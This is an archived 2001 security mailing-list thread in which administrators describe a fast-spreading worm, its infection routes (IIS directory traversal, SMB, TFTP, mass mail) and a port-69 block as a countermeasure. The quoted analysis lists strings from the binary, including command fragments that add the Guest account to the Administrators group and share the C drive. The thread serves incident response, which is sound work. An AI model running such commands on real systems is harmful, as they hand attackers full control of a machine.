We've blocked 69/udp at our internal and border routers both incoming and outgoing. Be careful with your private networks. Our tech support department contracted this bug by opening a web page of an infected customer in response to a complaint about performance. Dave Sill Server Admin Socket Internet Services davidsat_private On Tuesday 18 September 2001 15:10, you wrote: > YES > > --- Dave Sill <davidsat_private> wrote: > > You say that the worm gets a payload by tftp... Is > > it using port 69? > > > > Thanks, > > > > Dave Sill > > Server Admin > > Socket Internet Services > > davidsat_private > > > > Is the worm > > > > On Tuesday 18 September 2001 10:47, you wrote: > > > Hi all! > > > > > > > > > We've all just been hit by a VERY aggressive > > > > worm/virus. > > > > > Quick analysis indicates that it propagates itself > > > > in > > > > > a number of different ways: > > > > > > Through use of IIS UNICODE direcory traversal > > > > coupled > > > > > with the recent IIS .dll privilege escalation > > > > attack. > > > > > It uses SMB/CIFS and TFTP to get the worm payload. > > > > > > Through MAPI mails (probably to all of > > > > addressbook). > > > > > Other ways of spreading may be possible, but we > > > > haven't > > > > > yet had the time to properly analyse the > > > > worm/virus. > > > > > It seems to share "c:\" via SMB/CIFS as "c$" and > > > the worm/virus also adds the "Guest" user and > > > > "Guests" > > > > > group to the local "Administrators" group.... > > > > > > > > > Interesting strings in binary: > > > > > > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China > > SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security > > > > share c$=c:\ > > > user guest "" > > > localgroup Administrators guest /add > > > localgroup Guests guest /add > > > user guest /active > > > open > > > user guest /add > > > net > > > > > > > > > More info as we come upon it..... > > > > > > /olle > > --------------------------------------------------------------------------- > > > >- This list is provided by the SecurityFocus ARIS > > > > analyzer service. > > > > > For more information on this free incident > > > > handling, management > > > > > and tracking system please see: > > > > http://aris.securityfocus.com > > --------------------------------------------------------------------------- >- > > > This list is provided by the SecurityFocus ARIS > > analyzer service. > > For more information on this free incident handling, > > management > > and tracking system please see: > > http://aris.securityfocus.com > > __________________________________________________ > Terrorist Attacks on U.S. - How can you help? > Donate cash, emergency relief information > http://dailynews.yahoo.com/fc/US/Emergency_Information/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:42:26 PDT